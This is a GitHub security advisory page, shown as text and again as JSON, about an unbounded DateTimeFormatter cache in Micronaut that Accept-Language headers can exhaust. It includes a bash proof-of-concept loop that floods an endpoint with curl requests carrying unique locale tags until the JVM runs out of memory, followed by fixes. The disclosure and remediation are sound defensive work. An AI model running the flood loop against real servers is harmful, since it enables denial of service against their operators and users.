GHSA-8HJV-92Q9-G4XJ

Vulnerability from github – Published: 2026-05-06 20:00 – Updated: 2026-05-13 16:41
VLAI
Summary
Micronaut has unbounded `formattersCache` in `TimeConverterRegistrar` that Allows Memory Exhaustion via `Accept-Language` Header
Details

Summary

TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (DefaultHtmlErrorResponseBodyProvider), but TimeConverterRegistrar.formattersCache was not covered by that fix.

Details

The vulnerable cache is declared in context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java at line 123:

// TimeConverterRegistrar.java:123
private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentHashMap<>();

The getFormatter method at line 434 inserts into this map with no eviction or size limit:

// TimeConverterRegistrar.java:434-443
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
    var key = pattern + context.getLocale();        // locale from Accept-Language header
    var cachedFormatter = formattersCache.get(key);
    if (cachedFormatter != null) {
        return cachedFormatter;
    }
    var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale());
    formattersCache.put(key, formatter);            // NO SIZE CHECK — unbounded growth
    return formatter;
}

The attacker-controlled locale flows into the cache key through this call chain:

  1. HTTP header parsedHttpHeaders.findAcceptLanguage() at http/src/main/java/io/micronaut/http/HttpHeaders.java:766-771 calls Locale.forLanguageTag(part) directly on the raw Accept-Language value:
// HttpHeaders.java:766-771
default Optional<Locale> findAcceptLanguage() {
    return findFirst(HttpHeaders.ACCEPT_LANGUAGE)
        .map(text -> {
            String part = HttpHeadersUtil.splitAcceptHeader(text);
            return part == null ? Locale.getDefault() : Locale.forLanguageTag(part);
        });
}
  1. Locale planted in ConversionContextAbstractRouteMatch.newContext() at router/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378 passes the request locale into the conversion context for every route argument binding:
// AbstractRouteMatch.java:373-378
private <E> ArgumentConversionContext<E> newContext(Argument<E> argument, HttpRequest<?> request) {
    return ConversionContext.of(
        argument,
        request.getLocale().orElse(null),   // ← attacker-controlled via Accept-Language
        request.getCharacterEncoding()
    );
}
  1. Unbounded cache insert — When any temporal argument annotated with @Format is bound, TimeConverterRegistrar.getFormatter(pattern, context) is called and inserts a new DateTimeFormatter for each unique pattern + locale key.

This path is triggered for any route endpoint with a @Format-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite:

// test-suite/.../BindingController.java:105 (official Micronaut example)
@Get("/dateFormat")
public String dateFormat(@Format("dd/MM/yyyy hh:mm:ss a z") @Header ZonedDateTime date) {
    return date.toString();
}

TimeConverterRegistrar is an @Internal core bean registered unconditionally in every Micronaut application — it is not optional or user-configured. By contrast, the DefaultHtmlErrorResponseBodyProvider cache patched in GHSA-2hcp-gjrf-7fhc now uses a ConcurrentLinkedHashMap bounded at 100 entries; TimeConverterRegistrar.formattersCache remains an unbounded plain ConcurrentHashMap.

PoC

Against any Micronaut application exposing an endpoint with a @Format-annotated temporal parameter:

# Flood the formattersCache with unique locale-derived keys
for i in $(seq 1 200000); do
  curl -s -o /dev/null \
    -H "Accept-Language: en-x-$(printf '%06d' $i)" \
    -H "date: 01/01/2024 12:00:00 AM UTC" \
    "http://localhost:8080/dateFormat" &
  # Throttle to avoid socket exhaustion
  [ $((i % 500)) -eq 0 ] && wait
done
wait
# Server will throw OutOfMemoryError after enough unique locale entries accumulate

Each request with a novel en-x-XXXXXX private-use tag inserts a new DateTimeFormatter entry into the unbounded map. Each DateTimeFormatter (with locale metadata) occupies roughly 2–10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with OutOfMemoryError: Java heap space.

Impact

  • An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a @Format-annotated temporal type parameter — a documented, first-class framework feature.
  • Memory grows linearly with the number of unique Accept-Language values sent. The BCP 47 private-use namespace (en-x-ANYTHING) provides millions of distinct valid locale strings.
  • No credentials, special permissions, or exploitation of application logic are required — only the ability to send HTTP requests with custom headers.
  • TimeConverterRegistrar is active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.

Recommended Fix

Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded ConcurrentHashMap with a bounded ConcurrentLinkedHashMap:

// In TimeConverterRegistrar.java — replace line 123
import io.micronaut.core.util.clhm.ConcurrentLinkedHashMap;

private static final int MAX_FORMATTERS_CACHE_SIZE = 100;

private final Map<String, DateTimeFormatter> formattersCache =
    new ConcurrentLinkedHashMap.Builder<String, DateTimeFormatter>()
        .maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE)
        .build();

Alternatively, since @Format pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:

// In getFormatter() — cache only by pattern, apply locale at use-time
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
    DateTimeFormatter base = formattersCache.computeIfAbsent(
        pattern, p -> DateTimeFormatter.ofPattern(p)
    );
    Locale locale = context.getLocale();
    return locale != null ? base.withLocale(locale) : base;
}

This second approach bounds the cache by the number of distinct @Format patterns in the application, which is always small and finite, fully eliminating the attack surface.

Severity
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.micronaut:micronaut-context"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.3.0"
            },
            {
              "fixed": "4.10.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44241"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T20:00:22Z",
    "nvd_published_at": "2026-05-12T22:16:35Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`TimeConverterRegistrar` caches `DateTimeFormatter` instances in an unbounded `ConcurrentHashMap\u003cString, DateTimeFormatter\u003e` whose key is derived from the `@Format` annotation pattern concatenated with the locale from the HTTP `Accept-Language` header. Because `Locale.forLanguageTag()` accepts arbitrary BCP 47 private-use extensions (`en-x-a001`, `en-x-a002`, \u2026), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (`DefaultHtmlErrorResponseBodyProvider`), but `TimeConverterRegistrar.formattersCache` was not covered by that fix.\n\n## Details\n\nThe vulnerable cache is declared in `context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java` at line 123:\n\n```java\n// TimeConverterRegistrar.java:123\nprivate final Map\u003cString, DateTimeFormatter\u003e formattersCache = new ConcurrentHashMap\u003c\u003e();\n```\n\nThe `getFormatter` method at line 434 inserts into this map with no eviction or size limit:\n\n```java\n// TimeConverterRegistrar.java:434-443\nprivate DateTimeFormatter getFormatter(String pattern, ConversionContext context) {\n    var key = pattern + context.getLocale();        // locale from Accept-Language header\n    var cachedFormatter = formattersCache.get(key);\n    if (cachedFormatter != null) {\n        return cachedFormatter;\n    }\n    var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale());\n    formattersCache.put(key, formatter);            // NO SIZE CHECK \u2014 unbounded growth\n    return formatter;\n}\n```\n\nThe attacker-controlled locale flows into the cache key through this call chain:\n\n1. **HTTP header parsed** \u2014 `HttpHeaders.findAcceptLanguage()` at `http/src/main/java/io/micronaut/http/HttpHeaders.java:766-771` calls `Locale.forLanguageTag(part)` directly on the raw `Accept-Language` value:\n\n```java\n// HttpHeaders.java:766-771\ndefault Optional\u003cLocale\u003e findAcceptLanguage() {\n    return findFirst(HttpHeaders.ACCEPT_LANGUAGE)\n        .map(text -\u003e {\n            String part = HttpHeadersUtil.splitAcceptHeader(text);\n            return part == null ? Locale.getDefault() : Locale.forLanguageTag(part);\n        });\n}\n```\n\n2. **Locale planted in ConversionContext** \u2014 `AbstractRouteMatch.newContext()` at `router/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378` passes the request locale into the conversion context for every route argument binding:\n\n```java\n// AbstractRouteMatch.java:373-378\nprivate \u003cE\u003e ArgumentConversionContext\u003cE\u003e newContext(Argument\u003cE\u003e argument, HttpRequest\u003c?\u003e request) {\n    return ConversionContext.of(\n        argument,\n        request.getLocale().orElse(null),   // \u2190 attacker-controlled via Accept-Language\n        request.getCharacterEncoding()\n    );\n}\n```\n\n3. **Unbounded cache insert** \u2014 When any temporal argument annotated with `@Format` is bound, `TimeConverterRegistrar.getFormatter(pattern, context)` is called and inserts a new `DateTimeFormatter` for each unique `pattern + locale` key.\n\nThis path is triggered for any route endpoint with a `@Format`-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework\u0027s own test suite:\n\n```java\n// test-suite/.../BindingController.java:105 (official Micronaut example)\n@Get(\"/dateFormat\")\npublic String dateFormat(@Format(\"dd/MM/yyyy hh:mm:ss a z\") @Header ZonedDateTime date) {\n    return date.toString();\n}\n```\n\n`TimeConverterRegistrar` is an `@Internal` core bean registered unconditionally in every Micronaut application \u2014 it is not optional or user-configured. By contrast, the `DefaultHtmlErrorResponseBodyProvider` cache patched in GHSA-2hcp-gjrf-7fhc now uses a `ConcurrentLinkedHashMap` bounded at 100 entries; `TimeConverterRegistrar.formattersCache` remains an unbounded plain `ConcurrentHashMap`.\n\n## PoC\n\nAgainst any Micronaut application exposing an endpoint with a `@Format`-annotated temporal parameter:\n\n```bash\n# Flood the formattersCache with unique locale-derived keys\nfor i in $(seq 1 200000); do\n  curl -s -o /dev/null \\\n    -H \"Accept-Language: en-x-$(printf \u0027%06d\u0027 $i)\" \\\n    -H \"date: 01/01/2024 12:00:00 AM UTC\" \\\n    \"http://localhost:8080/dateFormat\" \u0026\n  # Throttle to avoid socket exhaustion\n  [ $((i % 500)) -eq 0 ] \u0026\u0026 wait\ndone\nwait\n# Server will throw OutOfMemoryError after enough unique locale entries accumulate\n```\n\nEach request with a novel `en-x-XXXXXX` private-use tag inserts a new `DateTimeFormatter` entry into the unbounded map. Each `DateTimeFormatter` (with locale metadata) occupies roughly 2\u201310 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with `OutOfMemoryError: Java heap space`.\n\n## Impact\n\n- An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a `@Format`-annotated temporal type parameter \u2014 a documented, first-class framework feature.\n- Memory grows linearly with the number of unique `Accept-Language` values sent. The BCP 47 private-use namespace (`en-x-ANYTHING`) provides millions of distinct valid locale strings.\n- No credentials, special permissions, or exploitation of application logic are required \u2014 only the ability to send HTTP requests with custom headers.\n- `TimeConverterRegistrar` is active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.\n\n## Recommended Fix\n\nApply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded `ConcurrentHashMap` with a bounded `ConcurrentLinkedHashMap`:\n\n```java\n// In TimeConverterRegistrar.java \u2014 replace line 123\nimport io.micronaut.core.util.clhm.ConcurrentLinkedHashMap;\n\nprivate static final int MAX_FORMATTERS_CACHE_SIZE = 100;\n\nprivate final Map\u003cString, DateTimeFormatter\u003e formattersCache =\n    new ConcurrentLinkedHashMap.Builder\u003cString, DateTimeFormatter\u003e()\n        .maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE)\n        .build();\n```\n\nAlternatively, since `@Format` pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:\n\n```java\n// In getFormatter() \u2014 cache only by pattern, apply locale at use-time\nprivate DateTimeFormatter getFormatter(String pattern, ConversionContext context) {\n    DateTimeFormatter base = formattersCache.computeIfAbsent(\n        pattern, p -\u003e DateTimeFormatter.ofPattern(p)\n    );\n    Locale locale = context.getLocale();\n    return locale != null ? base.withLocale(locale) : base;\n}\n```\n\nThis second approach bounds the cache by the number of distinct `@Format` patterns in the application, which is always small and finite, fully eliminating the attack surface.",
  "id": "GHSA-8hjv-92q9-g4xj",
  "modified": "2026-05-13T16:41:14Z",
  "published": "2026-05-06T20:00:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-8hjv-92q9-g4xj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44241"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/micronaut-projects/micronaut-core"
    },
    {
      "type": "WEB",
      "url": "https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.22"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Micronaut has unbounded `formattersCache` in `TimeConverterRegistrar` that Allows Memory Exhaustion via `Accept-Language` Header"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.